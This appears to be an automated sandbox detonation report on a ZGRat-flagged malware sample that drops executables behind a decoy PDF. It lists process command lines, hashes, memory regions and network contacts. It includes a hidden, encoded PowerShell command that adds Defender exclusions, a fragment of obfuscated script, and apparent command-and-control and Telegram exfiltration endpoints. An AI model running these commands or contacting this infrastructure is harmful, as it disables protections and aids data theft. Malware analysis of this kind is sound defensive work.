@(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38853,38829,38835,38829,38831,38846,38853,38844,38848,38778,38833,38852,38833));hPhLUO $RYunDk $ehQGZXVzn;OuyjBhDPrdGwPbLI $RYunDk;};;;;}gNBuaXtjuReBmDfHma;

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\RIB.pdf"

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

"C:\Users\Admin\AppData\Roaming\yagacrypt.exe"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0C7AA00897205B0621305857D4844299 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4E8D65E53F52C2E793C436F7B299ADBD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4E8D65E53F52C2E793C436F7B299ADBD --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --renderer-client-id=4 --mojo-platform-channel-handle=2284 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=52B0186A564DE3CD6194553D4ACAB064 --mojo-platform-channel-handle=2548 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=73AC7C45C0CF6A5E20EAE9DA9193AB63 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3261FE8E9A19406519F4ABADEEF0918A --mojo-platform-channel-handle=2596 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Users\Admin\AppData\Local\Temp\ggiac.exe

C:\Users\Admin\AppData\Local\Temp\ggiac.exe

C:\Users\Admin\AppData\Local\Temp\ggiac.exe

C:\Users\Admin\AppData\Local\Temp\ggiac.exe

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 74.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 90.10.21.104.in-addr.arpa udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 5.179.17.96.in-addr.arpa udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.166.126.56:443 tcp
GB 23.37.0.169:443 tcp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.114.59.183:443 tcp
US 8.8.8.8:53 udp
GB 104.77.160.14:80 tcp
US 8.8.8.8:53 udp
N/A 93.184.221.240:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
GB 96.17.179.41:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp
FR 194.33.191.53:58001 tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 53.191.33.194.in-addr.arpa udp
FR 194.33.191.53:58001 tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp

Files

memory/1868-3-0x0000000004D20000-0x0000000004D30000-memory.dmp

memory/1868-2-0x0000000004D20000-0x0000000004D30000-memory.dmp

memory/1868-1-0x0000000071570000-0x0000000071D20000-memory.dmp

memory/1868-4-0x0000000005360000-0x0000000005988000-memory.dmp

memory/1868-0-0x00000000028C0000-0x00000000028F6000-memory.dmp

memory/1868-5-0x0000000005230000-0x0000000005252000-memory.dmp

memory/1868-12-0x0000000005BA0000-0x0000000005C06000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0naqnljo.j0i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1868-6-0x0000000005A80000-0x0000000005AE6000-memory.dmp

memory/1868-17-0x0000000005DF0000-0x0000000006144000-memory.dmp

memory/1868-18-0x00000000061F0000-0x000000000620E000-memory.dmp

memory/1868-19-0x00000000062A0000-0x00000000062EC000-memory.dmp

memory/1868-20-0x0000000004D20000-0x0000000004D30000-memory.dmp

memory/1868-23-0x0000000006780000-0x00000000067A2000-memory.dmp

memory/1868-24-0x00000000078C0000-0x0000000007E64000-memory.dmp

memory/1868-22-0x0000000006710000-0x000000000672A000-memory.dmp

memory/1868-21-0x0000000007270000-0x0000000007306000-memory.dmp

memory/1868-25-0x00000000084F0000-0x0000000008B6A000-memory.dmp

memory/4080-42-0x0000000071570000-0x0000000071D20000-memory.dmp

memory/1868-44-0x0000000071570000-0x0000000071D20000-memory.dmp

memory/4080-43-0x00000000057C0000-0x00000000057C6000-memory.dmp

memory/4080-41-0x0000000000FE0000-0x0000000000FF4000-memory.dmp

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

MD5 d9c253eaa73b4a33b91def3e863d644e
SHA1 626c26f275e691183fa48b68daf586e24960cc3e
SHA256 45474eaa30615f25da4e0f31447222de844cfea4375eaff3a6d9adf19101e654
SHA512 5041ca9cce11cc44a11525eac5944a5fd21652b53794f4c2eb656f33d7d2e8cf2bd7ee25304a829578e57869b77d36c624059108ab8f018ef85ab673efc391c7

C:\Users\Admin\AppData\Roaming\RIB.pdf

MD5 ac6f4727f46bff3bd3f71550ae96c15f
SHA1 5966b42c1989bf6886c887a29480bd8a249476ee
SHA256 580b5d3ab9575c944f5f15f42fe82a5024411a68f759ee7137e0403ac2b568e0
SHA512 734a98dd5dad4674bd56b6138a94580be819c77ec3945901053b6c9f9a8bd34f4975f3a71b363ca257bfe0187cebe52bbb65fc262cb59f923396f5c2cebe737a

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

MD5 220f7a6283256dfda65a5879cb7d8afc
SHA1 b640bc6f963b8cdc8104fb8f99ca7b3a34a510b0
SHA256 bac0966abfbc560de0f8802564fc5bc95e8492f838b394404641183a27c30b37
SHA512 e7e88895d26431f84c71b69c27b2549f7ecc5b2e473c3dc3c4f3bf52439d98d6e01e3640d142b8d0fe0a3e9da1b1efcd8b6a3233d86848ad53787e6c73014f89

C:\Users\Admin\AppData\Roaming\yagacrypt.exe

MD5 0abd42634db4f4fb3bbbcaa066413d68
SHA1 074f62ae3b24d775f09e98e81e857e6f1be05f3b
SHA256 a2ac7be629121924985b42fdf34380efe12be78a3d8665b625a2eae80808cff4
SHA512 578ef89e668c8e38e66353f485be2b90ebf8ec21bcf0f5de0ec65ee0710b55256876f28219e540beaf2dea41224c51355dc9a39930cfa3b231b3450264ac47d2

memory/4080-46-0x0000000006360000-0x000000000648A000-memory.dmp

memory/4080-47-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-52-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-54-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-50-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-58-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-66-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-72-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-78-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-82-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-90-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-96-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-100-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-102-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-104-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-108-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-110-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-106-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-98-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-94-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-92-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-88-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-86-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-84-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-80-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-76-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-74-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-70-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-68-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-64-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-62-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-60-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-56-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-48-0x0000000006360000-0x0000000006483000-memory.dmp

memory/4080-992-0x00000000064B0000-0x00000000064B1000-memory.dmp

memory/4080-997-0x0000000006790000-0x00000000067DC000-memory.dmp

memory/4080-996-0x0000000006690000-0x0000000006750000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 b30d3becc8731792523d599d949e63f5
SHA1 19350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256 b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512 523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/556-1111-0x0000000000400000-0x000000000049C000-memory.dmp

memory/556-1115-0x0000000004E00000-0x0000000004EE8000-memory.dmp

memory/556-1114-0x0000000002980000-0x0000000002990000-memory.dmp

memory/556-1113-0x0000000071570000-0x0000000071D20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\yagacrypt.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

memory/4080-1112-0x0000000071570000-0x0000000071D20000-memory.dmp

memory/556-3349-0x0000000004F80000-0x0000000004FD6000-memory.dmp

memory/556-3355-0x0000000005650000-0x00000000056A4000-memory.dmp

memory/556-3357-0x0000000071570000-0x0000000071D20000-memory.dmp

memory/392-3358-0x000001AA3D780000-0x000001AA3D7A2000-memory.dmp

memory/392-3368-0x00007FFCA0130000-0x00007FFCA0BF1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 569124b0982577268dcbc9070e76fea0
SHA1 149910730a6bc3a691d8df4dafb3cc12fd625496
SHA256 b3f8175d4f6cb09f6d2f912e1bf6d31caeaa5aa16abb84831051c883f16e7ec1
SHA512 fb34ef6fc5f61a16112e1fb1223f07a9d309e7871638d8792435e56ca4a8201b953d51047d264505bdd420898602d96419380f0ad0b68ae474c0b4a583ffaf95

memory/392-3369-0x000001AA229D0000-0x000001AA229E0000-memory.dmp

memory/392-3373-0x00007FFCA0130000-0x00007FFCA0BF1000-memory.dmp

C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe

MD5 d9978a7bc703072527518ec65490fabb
SHA1 4cfc423812a29a857dd4d7db38bb648be228df30
SHA256 edfc6d7d35c07e5cd1f9fa65b8c4861adaa39ef7091fe14c51b87a1d4932e5e5
SHA512 c3f248557d1c35f1d7ec5a96fbf784e52110fecaefcb82001426b996b58e43154e57c37484b3be974efac8e7b494d69a755808910af3e10fd82edc15a0ee6222

memory/3152-3395-0x0000000005480000-0x0000000005490000-memory.dmp

memory/3152-3394-0x0000000071660000-0x0000000071E10000-memory.dmp

memory/3152-4328-0x0000000005FE0000-0x0000000005FE1000-memory.dmp

memory/1592-4341-0x00000000057B0000-0x00000000057C0000-memory.dmp

memory/3152-4342-0x0000000071660000-0x0000000071E10000-memory.dmp

memory/1592-4340-0x0000000071660000-0x0000000071E10000-memory.dmp

memory/1092-6584-0x0000000071660000-0x0000000071E10000-memory.dmp

memory/1092-6585-0x0000000005240000-0x0000000005250000-memory.dmp

memory/1592-6586-0x0000000071660000-0x0000000071E10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/2784-7257-0x00007FFCA13F0000-0x00007FFCA1EB1000-memory.dmp

memory/2784-7278-0x0000016305F40000-0x0000016305F50000-memory.dmp

memory/2784-7299-0x0000016305F40000-0x0000016305F50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9b80cd7a712469a4c45fec564313d9eb
SHA1 6125c01bc10d204ca36ad1110afe714678655f2d
SHA256 5a9e4969c6cdb5d522c81ce55799effb7255c1b0a9966a936d1dc3ff8fe2112d
SHA512 ac280d2623c470c9dec94726a7af0612938723f3c7d60d727eb3c21f17be2f2049f97bc8303558be8b01f94406781ece0ada9a3bc51e930aff20bebb6ca17584

memory/1092-7534-0x0000000005B40000-0x0000000005B41000-memory.dmp

memory/2784-7533-0x0000016305F40000-0x0000016305F50000-memory.dmp

memory/2784-7535-0x0000016305F40000-0x0000016305F50000-memory.dmp

memory/2784-7537-0x00007FFCA13F0000-0x00007FFCA1EB1000-memory.dmp

memory/1092-7544-0x0000000071660000-0x0000000071E10000-memory.dmp

memory/1092-7545-0x0000000005240000-0x0000000005250000-memory.dmp

memory/1708-7549-0x0000000071660000-0x0000000071E10000-memory.dmp

memory/1092-7550-0x0000000071660000-0x0000000071E10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ggiac.exe

MD5 f3ed43acd7d035e8c6035c7d65ec60bf
SHA1 679c01b051cbd42b740a05f0cd2807b16bae5aec
SHA256 136f29247b40b1cd3e65d093fd0529d6115ade980092b6a950d461b5c046daef
SHA512 fc5b4dd5abc2e8e141b25ed4bd77509a0af1ce24b695e44b563ad93192f74c0dd147e4eb0e9da7052459b4dec975d6c99d842f77dc4e002a3631dc27a9ff4db5

memory/3416-9795-0x0000000000140000-0x000000000015C000-memory.dmp

memory/1708-9796-0x0000000071660000-0x0000000071E10000-memory.dmp

memory/3416-9798-0x0000000004B10000-0x0000000004B20000-memory.dmp

memory/3416-9797-0x0000000071660000-0x0000000071E10000-memory.dmp

memory/3416-9799-0x00000000054E0000-0x0000000005616000-memory.dmp

memory/1708-10073-0x0000000005730000-0x0000000005740000-memory.dmp

memory/3416-10739-0x0000000004B00000-0x0000000004B01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Downloads.txt

MD5 ae0f7fab163139c661e576fe0af08651
SHA1 7545ab94360fd93f2209021b4cecabb92592be27
SHA256 832ff6318e2c78ac1907c74f3911f8815b545c16449cbce6753e21fb723cb657
SHA512 a3e342a3c72c079db96a8d6bb108830c3a772b926be0cf4e5d09ebb09e1babbc7602959bf1f82c8df8764f45479f318c3205114f23c96fd663efa792cff86b8b

Analysis: behavioral24

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\xw.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
